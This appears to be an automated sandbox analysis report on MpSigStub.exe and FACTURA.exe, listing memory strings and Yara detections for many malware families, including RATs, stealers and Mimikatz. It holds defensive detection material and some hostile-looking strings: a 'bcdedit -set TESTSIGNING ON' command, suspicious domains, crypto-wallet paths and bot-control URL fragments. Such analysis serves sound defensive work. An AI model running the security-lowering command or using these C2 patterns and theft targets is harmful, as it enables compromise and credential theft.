Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p idrivecheck.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&idrivedownload.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p filmverbine.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: !#nri:ti:domains:bazarcall.a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brinsc$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj.1c$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\autolive.live
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\autolive.livec$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\cnshelper.ch.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\cnshelper.ch.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins.1c&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\installer.brins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\installer.brinsc&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\autolive.live.1
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp, MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp, MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: Progman Folder*Administrative Tools
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Code function: 35_2_00007FF67CD48ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 35_2_00007FF67CD48ED4

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
May enable test signing (to load unsigned drivers)
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
May initialize a security null descriptor
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: &S:(ML;;NRNWNX;;;LW)
AV process strings found (often used to terminate AV products)

Stealing of Sensitive Information:

Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Generic Dropper
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mimikatz
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: wallet.datelectrum.dat
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: exodus.exe
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: 1Minimal configuration file for Ethereum mining is
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Yara detected Credential Stealer
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Remote Access Functionality:

Yara detected Metasploit Payload
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected NetWire RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Detected Imminent RAT
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Detected HawkEye Rat
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger]
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Detected Remcos RAT
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
Yara detected Codoso Ghost
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Contains VNC / remote desktop functionality (version string found)
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Yara detected RemCom RemoteAdmin tool
Source: Yara match File source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Contains strings related to BOT control commands
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>
No contacted IP infos